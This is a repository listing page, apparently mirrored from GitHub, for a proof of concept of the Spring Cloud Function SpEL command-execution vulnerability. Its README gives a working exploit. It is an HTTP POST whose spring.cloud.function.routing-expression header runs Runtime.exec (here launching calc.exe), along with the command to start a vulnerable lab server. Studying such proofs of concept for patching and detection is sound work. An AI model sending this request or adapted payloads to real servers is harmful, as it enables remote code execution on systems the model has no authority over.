https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel

Spring Cloud Function Spel命令执行漏洞
https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel

Last synced: about 2 months ago
JSON representation

Spring Cloud Function Spel命令执行漏洞

• Host: GitHub
• URL: https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel
• Owner: tangxiaofeng7
• Created: 2022-03-26T14:05:33.000Z (almost 3 years ago)
• Default Branch: main
• Last Pushed: 2022-03-27T07:57:35.000Z (almost 3 years ago)
• Last Synced: 2024-08-05T17:35:57.312Z (5 months ago)
• Language: Java
• Size: 77.1 KB
• Stars: 39
• Watchers: 2
• Forks: 8
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

• awesome-hacking-lists - tangxiaofeng7/Spring-Cloud-Function-Spel - Spring Cloud Function Spel命令执行漏洞 (Java)

README

        
## Spring-Cloud-Function-Spel命令执行漏洞

> environment：jdk17

start:

```

mvn spring-boot:run

```

exp:

```

POST /spring HTTP/1.1

Host: 192.168.0.104:8080

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe")

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

```

![img.png](images/calc.png)